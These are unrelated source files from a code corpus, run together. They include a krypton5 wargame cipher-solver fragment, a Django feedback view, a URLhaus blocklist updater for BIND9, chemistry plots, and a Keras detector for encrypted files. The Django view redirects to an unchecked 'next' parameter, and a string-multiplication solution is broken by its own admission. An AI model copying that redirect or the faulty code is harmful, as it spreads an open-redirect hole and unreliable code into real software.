filename[-3]\n aux = [frequency_analysis(filename)[0][:size]]\n fa_res[-1] += aux\n\nfor out in fa_res:\n find_key(out, size, ['found1', 'found2', 'found3', 'krypton6'])\n","sub_path":"krypton5/decifer.py","file_name":"decifer.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379081364","text":"# Copyright 2016 United States Government as represented by the Administrator\n# of the National Aeronautics and Space Administration. All Rights Reserved.\n#\n# Portion of this code is Copyright Geoscience Australia, Licensed under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file\n# except in compliance with the License. You may obtain a copy of the License\n# at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.shortcuts import render, redirect\nfrom django.template import loader, RequestContext\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.conf import settings\nfrom django.http import HttpResponse, JsonResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom email.message import EmailMessage\nimport smtplib\n\nfrom .forms import SubmitFeedbackForm\n\ndef home(request):\n \"\"\"\n Navigates to the home page of the application.\n\n **Context**\n\n **Template**\n\n :template:`home/index.html`\n \"\"\"\n\n context = {\n\n }\n return render(request, 'index.html', context)\n\n@login_required\ndef submit_feedback(request):\n if request.method == 'POST':\n form = SubmitFeedbackForm(request.POST)\n if form.is_valid():\n msg = EmailMessage()\n msg['From'] = \"admin@ceos-cube.org\"\n msg['To'] = settings.ADMIN_EMAIL\n msg['Subject'] = form.cleaned_data.get('feedback_reason')\n\n msg.set_content(\"Feedback sent from user: \" + request.user.email + \"\\n\" + form.cleaned_data.get('feedback'))\n\n with smtplib.SMTP('localhost') as s:\n s.send_message(msg)\n\n form_class = SubmitFeedbackForm\n context = {'title': \"Feedback\", 'form': form_class, 'successful_submission': 'Feedback was successfuly submitted. Thank you for your comments'}\n return render(request, 'submit_feedback.html', context)\n\n else:\n form_class = SubmitFeedbackForm\n context = {'title': \"Feedback\", 'form': form_class}\n if request.GET:\n next = request.GET.get('next', \"/\")\n if request.user.is_authenticated():\n return redirect(next)\n context['next'] = next\n return render(request, 'submit_feedback.html', context)\n","sub_path":"data_cube_ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"644370253","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__\t=\t\"Jason Brown\"\n__email__\t=\t\"jason.brown@svarthal.io\"\n__version__\t=\t\"0.3\"\n__license__\t=\t\"Apache\"\n__date__\t=\t\"20200211\"\n\n\nimport urllib.request\nfrom os import chown\nfrom os import chmod\nfrom os import system\nfrom shutil import move\nimport subprocess\n\ndef main():\n\n\t'''\n\t\tFetch new malware file and write it to disk\n\t'''\n\n\turlhaus = urllib.request.urlopen('https://urlhaus.abuse.ch/downloads/rpz/')\n\twith open ('db.urlhaus', 'b+w') as malware:\n\t\tmalware.write(urlhaus.read())\n\n\t'''\n\t\tSetting correct permissions on the db file and moving it to the Bind9 directory\n\t'''\n\tchown('db.urlhaus', 0, 114)\n\tchmod('db.urlhaus', 0o644)\n\tmove('db.urlhaus', '/etc/bind/svarthal/db.urlhaus')\n\tsystem('systemctl restart bind9')\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"urlhaus.py","file_name":"urlhaus.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368702415","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom tf_dpmd_kit import plot\nfrom tf_dpmd_kit import train\nimport os\nimport numpy as np\nimport matplotlib.transforms as mtransforms\nimport pandas as pd\n\nhomedir = os.environ['homedir']\n\ndef fig_a(\n ax\n):\n\n str_dir = homedir+'/research_d/202203_MDCarbonicAcid/server/03.train/03.iter17_initmodel/03.rmse_val.npt/'\n train.dptest_parity_plt(\n ax,\n str_file = str_dir+'dptest.e.out',\n int_natoms = 384,\n float_lw = 0.75,\n list_ticks = [-5, 0, 5],\n )\n\ndef fig_b(\n ax\n):\n\n str_dir = homedir+'/research_d/202203_MDCarbonicAcid/server/03.train/03.iter17_initmodel/03.rmse_val.npt/'\n train.dptest_parity_plt(\n ax,\n str_file = str_dir+'dptest.f.out',\n float_lw = 0.75,\n list_ticks = [-5, 0, 5],\n )\n\ndef rdfcsv(file):\n \n data = np.loadtxt(file)\n return data[:,0], data[:,1]\n \ndef fig_c(\n ax\n):\n\n dir_aimd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/CPBO/CC/carbonicrdf/'\n dir_dpmd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/DPMD/330K/CC/carbonicrdf/'\n df_dpmd = pd.read_csv(dir_dpmd+'carbonicrdf.csv', index_col='r(ang)')\n df_aimd = pd.read_csv(dir_aimd+'carbonicrdf.csv', index_col='r(ang)')\n dict2d_data ={\n 'DPMD': {\n 'o_w.o_w': [df_dpmd.index, df_dpmd['o_w.o_w']],\n },\n 'AIMD': {\n 'o_w.o_w': [df_aimd.index, df_aimd['o_w.o_w']],\n },\n }\n ax.set_ylabel('g(r)')\n ax.text(\n x=0.1,\n y=0.9,\n s = r'O$\\mathregular{_W}$-O$\\mathregular{_W}$',\n horizontalalignment = 'left',\n verticalalignment = 'top',\n transform=ax.transAxes\n )\n ax.set_ylim((0,4))\n for label, dict_data in dict2d_data.items():\n data = dict_data['o_w.o_w']\n ax.plot( data[0], data[1], label=label, lw=1)\n\n ax.legend(\n frameon = False,\n handlelength = 1\n )\n ax.set_xlabel('r (Å)')\n ax.set_xlim(1,6)\n\ndef fig_d(\n axs\n):\n\n dir_aimd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/CPBO/CC/carbonicrdf/'\n dir_dpmd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/DPMD/330K/CC/carbonicrdf/'\n df_dpmd = pd.read_csv(dir_dpmd+'carbonicrdf.csv', index_col='r(ang)')\n df_aimd = pd.read_csv(dir_aimd+'carbonicrdf.csv', index_col='r(ang)')\n dict_title = {\n 'o_nyl.h_w': r'$^=$O-H$\\mathregular{_W}$',\n 'o_oh.h_w': r'O$\\mathregular{_{OH}}$-H$\\mathregular{_W}$',\n 'h_oh.o_w': r'H$\\mathregular{_{OH}}$-O$\\mathregular{_W}$',\n }\n dict2d_data ={\n 'DPMD': {\n 'h_oh.o_w' : [df_dpmd.index, df_dpmd['cc.h_oh.o_w' ]],\n 'o_oh.h_w' : [df_dpmd.index, df_dpmd['cc.o_oh.h_w' ]],\n 'o_nyl.h_w': [df_dpmd.index, df_dpmd['cc.o_nyl.h_w']],\n },\n 'AIMD': {\n 'h_oh.o_w' : [df_aimd.index, df_aimd['cc.h_oh.o_w' ]],\n 'o_oh.h_w' : [df_aimd.index, df_aimd['cc.o_oh.h_w' ]],\n 'o_nyl.h_w': [df_aimd.index, df_aimd['cc.o_nyl.h_w']],\n },\n }\n dict_ylim = {\n 'h_oh.o_w': (0,3),\n 'o_oh.h_w': (0,2),\n 'o_nyl.h_w': (0,2),\n }\n \n for ax, key in zip(axs, dict_title):\n ax.set_ylabel('g(r)')\n ax.text(\n x=0.9,\n y=0.9,\n s = dict_title[key],\n horizontalalignment = 'right',\n verticalalignment = 'top',\n transform=ax.transAxes\n )\n ax.set_ylim(dict_ylim[key])\n for label, dict_data in dict2d_data.items():\n data = dict_data[key]\n ax.plot( data[0], data[1], label=label, lw=1)\n axs[0].tick_params(labelbottom=False)\n axs[1].tick_params(labelbottom=False)\n #axs[1].legend(\n # frameon = False,\n # handlelength = 1\n #)\n\n axs[-1].set_xlabel('r (Å)')\n axs[0].set_xlim(1,6)\n\ndef fig_e(\n ax,\n):\n ax.axis('off')\n str_dir = '/home/faye/research_d/202203_MDCarbonicAcid/server/01.init/H2CO3_CC_H2O_126/plm/'\n image = plt.imread(str_dir+'33733.png')\n ax.set_ylim(1200,-300)\n ax.imshow(image, origin='upper')\n\n plot.add_text(\n ax,\n dict_text = {\n #(700,250) :r'O$_W$' , \n #(1000,400) :r'H$_W$' , \n (572,365) :r'$\\bf{^=}$O',\n (1244,532) :r'H$\\bf{\\mathregular{_{OH}}}$',\n (1061,992) :r'O$\\bf{\\mathregular{_{OH}}}$',\n },\n ha = 'center',\n va = 'center',\n fontweight='bold'\n )\n\ndef fig_label(\n fig,\n axs,\n):\n\n x = -20/72\n y = 0/72\n dict_pos = {\n '(a)': (x, y),\n '(b)': (x, y),\n '(c)': (x, y),\n '(d)': (x, y),\n '(e)': (x, -12/72),\n }\n\n for ax, label in zip(axs, dict_pos.keys()):\n (x, y) = dict_pos[label]\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(x, y, fig.dpi_scale_trans)\n ax.text(0.0, 1.0, label, transform=ax.transAxes + trans,\n fontsize='medium', va='top')\n\n\ndef main():\n\n plot.set_rcparam()\n cm = 1/2.54\n mpl.rcParams['figure.dpi'] = 300\n mpl.rcParams['figure.constrained_layout.use'] = False\n\n fig = plt.figure( figsize = (8.6*cm, 10*cm) )\n\n gs = fig.add_gridspec(2, 1, height_ratios=[4, 7.4], left=0.1, right=0.99, bottom=0.1, top=0.99, hspace=0.3)\n\n gs0 = gs[0].subgridspec(1, 2, wspace=0.3)\n ax0 = fig.add_subplot(gs0[0])\n ax1 = fig.add_subplot(gs0[1])\n\n gs1 = gs[1].subgridspec(3, 2, wspace=0.3)\n ax2 = fig.add_subplot(gs1[0, 0])\n ax3 = fig.add_subplot(gs1[0, 1])\n ax4 = fig.add_subplot(gs1[1, 1], sharex=ax2)\n ax5 = fig.add_subplot(gs1[2, 1], sharex=ax2)\n ax6 = fig.add_subplot(gs1[1:, 0])\n\n fig_a(ax0)\n fig_b(ax1)\n fig_c(ax2)\n fig_d([ax3, ax4, ax5])\n fig_e(ax6)\n\n fig_label(\n fig,\n axs = [ax0,ax1,ax2,ax3,ax6]\n )\n\n plot.save(\n fig,\n file_save = 'fig_1',\n list_type = ['pdf', 'svg']\n )\n\n plt.show()\n\nmain()\n\n","sub_path":"202203_MDCarbonicAcid/fig_1_plt.py","file_name":"fig_1_plt.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"56703243","text":"# main.py\n\nimport math\nimport data\nimport optim\nfrom model import Model\n\n# parameters\nargs = {'batch_size': 100, # size of a mini-batch\n 'learning_rate': 1e-3, # learning rate\n 'momentum': 0.9, # decay parameter for the momentum vector\n 'weight_decay': 0, # L2 regularization on the weights\n 'epochs': 50, # maximum number of epochs to run\n 'init_wt': 0.01, # standard deviation of the initial random weights\n 'context_len': 3, # number of context words used\n 'embedding_dim': 16, # number of dimensions in embedding\n 'vocab_size': 250, # number of words in vocabulary\n 'num_hid': 128, # number of hidden units\n 'model_file': 'model.pk', # filename to save best model\n}\n\n# dataloaders\nloader_test = data.DataLoader(args['batch_size'], 'Test')\nloader_valid = data.DataLoader(args['batch_size'], 'Valid')\nloader_train = data.DataLoader(args['batch_size'], 'Train')\n\n# create model\nmodel = Model(args, loader_train.vocab)\n\n# initialize optimizer\noptimizer = optim.SGDMomentum(model.model, args['learning_rate'], args['momentum'], args['weight_decay'])\n\nbest_validation_loss = 10000000.0\n\nfor epoch in range(args['epochs']):\n # training\n total_acc, total_loss = 0, 0\n for batch in range(math.ceil(loader_train.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_train.get_batch()\n batch_size = input.size(0)\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n grad_loss = model.criterion.backward(loss)\n model.model.backward(grad_loss)\n model.model = optimizer.step(model.model)\n total_acc += acc\n total_loss += loss\n total_acc = total_acc / loader_train.get_size()\n total_loss = total_loss / loader_train.get_size()\n print(\"Training Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, total_loss, total_acc))\n\n # validation\n total_acc, total_loss = 0, 0\n for batch in range(math.ceil(loader_valid.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_valid.get_batch()\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n total_acc += acc\n total_loss += loss\n total_acc = total_acc / loader_valid.get_size()\n total_loss = total_loss / loader_valid.get_size()\n print(\"Validation Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, total_loss, total_acc))\n if best_validation_loss > total_loss:\n best_validation_loss = total_loss\n model.save(args['/Users/af1tang/Dropbox/courses/CSE891_DL/P1/programming-assignment-1/model_file'])\n else:\n print(\"Validation loss increased, finishing training.\")\n break\n print(' ')\n\n# testing\ntotal_acc, total_loss = 0, 0\nfor batch in range(math.ceil(loader_test.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_test.get_batch()\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n total_acc += acc\n total_loss += loss\ntotal_acc = total_acc / loader_test.get_size()\ntotal_loss = total_loss / loader_test.get_size()\nprint(\"Testing Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, total_loss, total_acc))\nprint(' ')\n","sub_path":"Backprop Example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"483874938","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nfrom fileHandler import (extract_data_from_all_files,\n read_data_from_file,\n divide_test_and_trainging_data,\n data_from_file,\n get_all_files_in_dir,\n create_map,\n map_to_file,\n stringToInt)\nfrom encrypter import (encrypt_file, decrypt_file, encrypt_file_header_skip)\n\n\n\ndef prepare_data():\n divide_test_and_trainging_data(\"OriginalFiles\", \"Test\", \"Training\")\n print(\"Files divided\")\n #Training Data\n files = get_all_files_in_dir(\"Training\")\n file_map = create_map(files)\n map_to_file(file_map, \"Training\" + \"_map\")\n print(\"Training map done\")\n for file_path, value in file_map.items():\n if(value == 1):\n encrypt_file(file_path)\n print(\"Training data encrypted\")\n extract_data_from_all_files(\"Training_data.txt\", file_map )\n print(\"Training data extracted\")\n #Test Data\n files = get_all_files_in_dir(\"Test\")\n file_map = create_map(files)\n map_to_file(file_map, \"Test_map\")\n print(\"Test map done\")\n for file_path, value in file_map.items():\n if(value == 1):\n encrypt_file(file_path)\n print(\"Test data encrypted\")\n extract_data_from_all_files(\"Test_data.txt\", file_map )\n print(\"Test data extracted\")\n\ndef train_model(layers,activationLayers,opti,lss):\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(layers[0], activation=activationLayers[0], input_dim=10))\n for l in range(1, len(layers)):\n model.add(keras.layers.Dense(layers[l], activation = activationLayers[l]))\n\n model.compile(optimizer=opti, loss=lss)\n\n trainingDataInput, trainingDataOutput = read_data_from_file(\"Training_data.txt\")\n #for data in trainingDataInput:\n # print(data)\n # print(\"\\n\")\n trainingInputTensor = tf.constant(trainingDataInput)\n trainingOutputTensor = tf.constant(trainingDataOutput)\n model.fit(trainingInputTensor,trainingOutputTensor, batch_size=len(trainingDataInput), epochs=2000, shuffle=True)\n keras.utils.plot_model(\n model,\n to_file='model.png',\n show_shapes=True,\n show_layer_names=True,\n rankdir='LR',\n expand_nested=True,\n dpi=96\n )\n testDataInput, testDataOutput = read_data_from_file(\"Test_data.txt\")\n testInputTensor = tf.constant(testDataInput)\n eval = model.predict(testInputTensor, batch_size=len(testDataInput))\n save_results(layers, activationLayers, opti, lss, eval, testDataOutput, len(trainingDataInput))\n #print(model.get_layer(index=0).weights)\n #model.save('./models/latest', True)\n return model\ndef load_latest_model():\n model = keras.models.load_model('./models/latest')\n return model\ndef is_encrypted(filepath, model):\n data = []\n temp_data = data_from_file(filepath)\n temp_data[0]= float(stringToInt(temp_data[0]))\n temp_data = [float(i) for i in temp_data]\n data.append(temp_data)\n \n InputTensor = tf.constant(data)\n prediction = model.predict(InputTensor)[0][0]\n return prediction\ndef save_results(layers, activationLayers, optimizer, loss, evaluation, testDataAnswers, num_training_data):\n f= open(\"results.txt\",\"a+\")\n id = get_last_id()\n f.write(\"************************************\\n\")\n f.write (time.asctime( time.localtime(time.time()) ))\n f.write(\"\\n\")\n f.write(\"id: %s \\n\" % str(id))\n f.write(\"Files in training data: %s\\n\" % num_training_data)\n f.write(\"Files in test data: %s\\n\" % len(testDataAnswers))\n f.write(\"Optimizer: %s \\n\" % optimizer)\n f.write(\"Loss: %s \\n\" % loss)\n f.write(\"Number of layers: %s \\n\" % len(layers))\n for i in range(0,len(layers)):\n f.write(\"%s_%s \\n\" % (layers[i], activationLayers[i]))\n highest_diff = 0.0\n average_diff = 0.0\n ninety_fifth_percentile = 0\n i=0\n for e in evaluation:\n #print(round(e[0],6) , \" -> \" , testDataAnswers[i][0])\n if highest_diff < abs(round(e[0],16)-testDataAnswers[i][0]):\n highest_diff = abs(round(e[0],16)-testDataAnswers[i][0])\n average_diff += abs(round(e[0],16)-testDataAnswers[i][0])\n if (testDataAnswers[i][0] < 0.5 and round(e[0],6) < 0.05):\n ninety_fifth_percentile += 1\n elif (testDataAnswers[i][0] > 0.5 and round(e[0],6) > 0.95):\n ninety_fifth_percentile += 1\n i+=1\n average_diff /= i\n ninety_fifth_percentile /=i\n f.write(\"Highest diff: %s\\n\" % highest_diff)\n f.write(\"Average diff: %s\\n\" % average_diff)\n f.write(\"95 percent certainty: %s\\n\" % ninety_fifth_percentile)\n f.write(\"************************************\\n\")\n f.close()\n f = open(\"trunc_results.txt\",\"a+\")\n f.write(str(id))\n f.write('$')\n f.write(time.asctime( time.localtime(time.time())))\n f.write('$')\n f.write(str(num_training_data))\n f.write('$')\n f.write(str(len(testDataAnswers)))\n f.write('$')\n f.write(str(optimizer))\n f.write('$')\n f.write(str(loss))\n f.write('$')\n f.write(str(len(layers)))\n f.write('$')\n f.write(str(highest_diff))\n f.write('$')\n f.write(str(average_diff))\n f.write('$')\n f.write(str(ninety_fifth_percentile))\n f.write('\\n')\n f.close()\ndef read_results(lines):\n f=open('trunc_results.txt', 'r')\n data = []\n idx = 0\n for line in f:\n if(idx >= lines[0] and idx <= lines[1] ):\n line_data = {}\n temp = line.split('$')\n line_data[\"id\"] = temp[0]\n line_data[\"date\"] = temp[1]\n line_data[\"num_training_data\"] = temp[2]\n line_data[\"num_test_data\"] = temp[3]\n line_data[\"optimizer\"] = temp[4]\n line_data[\"loss\"] = temp[5]\n line_data[\"num_layers\"] = temp[6]\n line_data[\"highest_diff\"] = temp[7]\n line_data[\"average_diff\"] = temp[8]\n line_data[\"amount_over_ninety_five\"] = temp[9]\n data.append(line_data)\n idx+=1\n return(data)\n f.close()\ndef get_last_id():\n f=open('trunc_results.txt', 'r')\n id = 0\n for line in f:\n id += 1\n return id\ndef flatten_results(input, output, data):\n i = []\n o = []\n for d in data:\n i.append(d[input])\n o.append(float(d[output]))\n return(i,o)\n\ndef print_fig(names ,figname, lines): \n res =read_results(lines)\n fig, ax = plt.subplots()\n for name in names:\n input, output = flatten_results(\"id\",name,res)\n ax.plot(input, output, label=name)\n ax.legend()\n\n plt.savefig(figname+\".png\", dpi=512)\n\n#prepare_data()\n\nactivationLayers = [\"hard_sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\"]\nopti = 'RMSprop' # Best Performance\nlss = tf.keras.losses.BinaryCrossentropy() # Best Performance\nlayers = [64,8,8,1]\n#model = train_model(layers,activationLayers,opti,lss)\n\n#model = load_latest_model()\n#model2.summary()\n#model.summary()\n#print_fig([\"average_diff\", \"highest_diff\"], \"figure\", [0,59])","sub_path":"ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117782998","text":"# Error - num += int(res[currentIndex])\n# ValueError: invalid literal for int() with base 10: ''\nclass Solution:\n\t# @param A : string\n\t# @param B : string\n\t# @return a strings\n\tdef multiply(self, A, B):\n\t\tres = []\n\t\tindex_a = self.remove_whitespace(A)\n\t\tindex_b = self.remove_whitespace(B)\n\t\tA[index_a:]\n\t\tB[index_b:]\n\t\tcarry, index = 0, 0\n\n\t\tfor i in xrange(len(A)-1, -1, -1):\n\t\t\t_a = int(A[i])\n\t\t\tnum = 0\n\t\t\tcurrentIndex = index\n\t\t\tfor j in xrange(len(B)-1, -1, -1):\n\t\t\t\t_b = int(B[j])\n\t\t\t\tnum = _a * _b + carry\n\t\t\t\tcarry = num / 10\n\t\t\t\tnum %= 10\n\t\t\t\tchar_number = chr(num)\n\n\t\t\t\tif currentIndex >= len(res):\n\t\t\t\t\tres.append(char_number)\n\t\t\t\telse:\n\t\t\t\t\tnum += int(res[currentIndex])\n\t\t\t\t\tcarry += num/10\n\t\t\t\t\tnum %= 10\n\t\t\t\t\tchar_number = chr(num)\n\t\t\t\t\tres[currentIndex] = char_number\n\t\t\t\tcurrentIndex += 1\n\t\t\tchar_number = str(carry)\n\t\t\tcarry = 0\n\t\t\tres.append(char_number)\n\t\t\tindex += 1\n\n\t\tres.reverse()\n\t\ti = self.remove_whitespace(res)\n\t\tif i == len(res):\n\t\t\treturn '0'\n\n\t\treturn ''.join(res[i:])\n\n\tdef remove_whitespace(self, A):\n\t\ti = 0\n\t\twhile i < len(A) and A[i] == '0':\n\t\t\ti += 1\n\t\treturn i\n\"\"\"\n\nGiven two numbers represented as strings, return multiplication of the numbers as a string.\n\n Note: The numbers can be arbitrarily large and are non-negative.\nNote2: Your answer should not have leading zeroes. For example, 00 is not a valid answer. \nFor example, \ngiven strings \"12\", \"10\", your answer should be “120”.\n\n\n\"\"\"","sub_path":"strings/multiply_strings.py","file_name":"multiply_strings.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599611073","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 20:52:57 2017\n\n@author: harvey\n\"\"\"\n\n#将一个字符串转化成int类型。题目非常简单,但要额外考虑的因素非常多,如下面\n#的一些字符串的处理:\"+123\", \" -23 \", \"231ji2\", null, \" \"等等。\n\nclass Solution(object):\n def myAtoi(self, string):\n \"\"\"\n :type string: str\n :rtype: int\n \"\"\"\n INT_MAX = 2147483647\n INT_MIN = -2147483648\n #check None situation\n if not string: #string为空\n return 0\n string = string.strip() #去掉字符串前后的空格\n if not string:#string为只包含空格的字符串\n return 0\n flag = 1\n if string[0] in ['+', '-']:\n if string[0] == '-':\n flag = -1\n string = string[1:]\n #string只包含+-号或string的首个字符不是数字\n if not string or not string[0].isdigit():\n return 0\n #Ignore all char after the first no-number char\n for i, v in enumerate(string):\n if not v.isdigit():\n string = string[:i]\n break\n result = 0\n for v in string[:]:\n result += ord(v) - ord('0')\n result *= 10\n result /= 10\n result *= flag\n if result > INT_MAX:\n return INT_MAX\n if result < INT_MIN:\n return INT_MIN\n return result\n \nif __name__ == \"__main__\":\n print(Solution().myAtoi(\" fsd-123jfldaj \"))\n print(Solution().myAtoi(\" -123jfldaj \"))\n print(Solution().myAtoi(\"222222222222222\"))\n \n ","sub_path":"atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"497332569","text":"from django.shortcuts import render, redirect,get_object_or_404\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.urls import reverse\nfrom .models import Comment\nfrom blog.models import *\nfrom course.models import *\nfrom user_profile.models import *\nfrom utils import check_user\n\n\n# Create your views here.\ndef update_comment(request,blog_id):\n res=check_user(request)\n if res:\n return res\n \n course=get_object_or_404(Blog,pk=blog_id).reference\n #course=get_object_or_404(CourseModel,pk=blog_id)\n \n if course.teacher!=request.user:\n get_object_or_404(SelectionModel,student=request.user,course=course)\n\n\n\n\n referer = request.META.get('HTTP_REFERER', reverse('index')) \n user = request.user\n\n #数据检查\n # if not user.is_authenticated:\n # return render(request, 'error.html', {'message':'用户未登录', 'redirect_to':referer})\n\n text = request.POST.get('text', '').strip()\n if text == '':\n return render(request, 'error.html', {'message':'评论内容为空', 'redirect_to':referer})\n\n try:\n content_type = request.POST.get('content_type', '')\n #object_id = int(request.POST.get('object_id', ''))\n object_id=blog_id\n model_class = ContentType.objects.get(model = content_type).model_class()\n model_obj = model_class.objects.get(pk = object_id)\n except Exception as e:\n return render(request, 'error.html', {'message':'评论对象不存在', 'redirect_to':referer})\n\n #检查通过,保存数据\n comment = Comment()\n comment.user = user\n comment.text = text\n comment.content_object = model_obj\n comment.save()\n\n return redirect(referer)","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"120549211","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nimport sys, os\n\nfrom sklearn.manifold import MDS\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nimport numpy as np\n\nsys.path.insert(1, os.path.join(os.path.realpath(os.path.pardir), 'code'))\nfrom utility import utility\n\n# mds = MDS(n_components = 2)\nlda = LDA()\nallVectors = np.array([])\nutil = utility('../code/pos_neg_matrix.pkl','../code/model.pkl', '../code/vectorizer.pkl')\nk = 50\ndata1 = util.getInitialization(k)\nn = 300\nallVectors = np.concatenate((np.random.permutation(data1['positiveCorpusVectors'])[:n], np.random.permutation(data1['negativeCorpusVectors'])[:n]))\ndata3 = util.getConfidence(allVectors)\nallVectors = allVectors[:, data1['featureIndex']]\nlda.fit(allVectors, [0] * n + [1] * n)\n\ndef index(request):\n return render(request, 'classifier1/index.html')\n\n@csrf_exempt\ndef predict(request):\n global allVectors, util, lda\n \n data = util.getSimilarityInfo([request.POST['sentence']])\n\n # corpusVectors = mds.fit_transform(np.concatenate((allVectors, [data['sentenceVector']])))\n # data['sentenceVector'] = corpusVectors[-1].tolist()\n data['sentenceVector'] = lda.transform([data['sentenceVector']]).tolist() + [data['confidence']]\n\n data['sentence'] = request.POST['sentence']\n data['confidence'] = round(data['confidence'], 3) * 100\n data['positiveCosineSimilarity'] = round(data['positiveCosineSimilarity'], 3)\n data['negativeCosineSimilarity'] = round(data['negativeCosineSimilarity'], 3)\n data['positiveOccurrences'] = ', '.join(data['positiveOccurrences'])\n data['negativeOccurrences'] = ', '.join(data['negativeOccurrences'])\n response = JsonResponse(data)\n return response\n\n@csrf_exempt\ndef initialize(request):\n global allVectors, n, data3, lda, data1, util\n data2 = util.getSimilarityInfo([request.POST['sentence']])\n data = dict(data1, **data2)\n\n # corpusVectors = mds.fit_transform(np.concatenate((allVectors, [data['sentenceVector']])))\n # data['positiveCorpusVectors'] = corpusVectors[:n]\n # data['negativeCorpusVectors'] = corpusVectors[n:]\n data['positiveCorpusVectors'] = np.concatenate((lda.transform(allVectors[:n]), data3[:n]), axis = 1).tolist()\n data['negativeCorpusVectors'] = np.concatenate((lda.transform(allVectors[n:]), data3[n:]), axis = 1).tolist()\n\n data['sentenceVector'] = lda.transform([data['sentenceVector']]).tolist() + [data['confidence']]\n\n data['confidence'] = round(data['confidence'], 3) * 100\n data['sentence'] = request.POST['sentence']\n data['positiveCosineSimilarity'] = round(data['positiveCosineSimilarity'], 3)\n data['negativeCosineSimilarity'] = round(data['negativeCosineSimilarity'], 3)\n data['positiveOccurrences'] = ', '.join(data['positiveOccurrences'])\n data['negativeOccurrences'] = ', '.join(data['negativeOccurrences'])\n # data = {\n # 'sentence': request.POST['sentence'],\n # 'result': 'POSITIVE',\n # 'sentenceVector': [],\n # 'positiveCosineSimilarity': 0.8,\n # 'negativeCosineSimilarity': 0.2,\n # 'positiveOccurrences': ', '.join(list(['a', 'b'])),\n # 'negativeOccurrences': ', '.join(list(['1', '2'])),\n\n # 'positiveCorpusVectors': [[]],\n # 'negativeCorpusVectors': [[]],\n # 'topWords': { 'foo': 12, 'bar': 6 },\n # 'bottomWords': { 'boo': 12, 'far': 6 },\n # }\n return render(request, 'classifier1/result.html', data)","sub_path":"FinalProject/web/classifier1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"240641992","text":"import numpy as np\nfrom scipy import ndimage\n\n########################################################################\n# Same code for feature extraction as that in 'Image Preprocessing.py' #\n########################################################################\n\ndef getPlaneBits(planeId, binary_image):\n return [int(b[planeId]) for b in binary_image]\n\ndef getBitPlanes(img):\n bin_image = []\n bit_planes = []\n\n for i in range(0, 512):\n for j in range(0, 512):\n bin_image.append(np.binary_repr(img[i][j], width = 8))\n \n for i in range(0, 8):\n bit_planes.append(np.array(getPlaneBits(i, bin_image)).reshape(512, 512))\n \n return 